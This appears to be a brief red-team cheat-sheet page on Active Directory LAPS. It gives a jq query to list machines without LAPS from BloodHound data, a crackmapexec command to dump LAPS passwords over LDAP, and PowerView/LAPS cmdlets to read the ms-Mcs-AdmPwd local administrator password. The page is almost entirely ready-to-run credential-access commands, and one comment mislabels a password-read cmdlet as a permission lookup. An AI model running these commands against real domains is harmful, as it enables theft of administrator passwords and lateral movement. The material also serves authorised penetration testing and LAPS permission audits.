Laps

Enum computers with out laps

cat 20240402174520_computers.json| jq '.data[].Properties | select(.haslaps == false) | .name' -r

Dumping LAPS Passwords

crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps

PowerView

# Find the principals that have ReadPropery on ms-Mcs-AdmPwd
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

# Read the password
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd
PreviousLSANextBrowser secrets

Last updated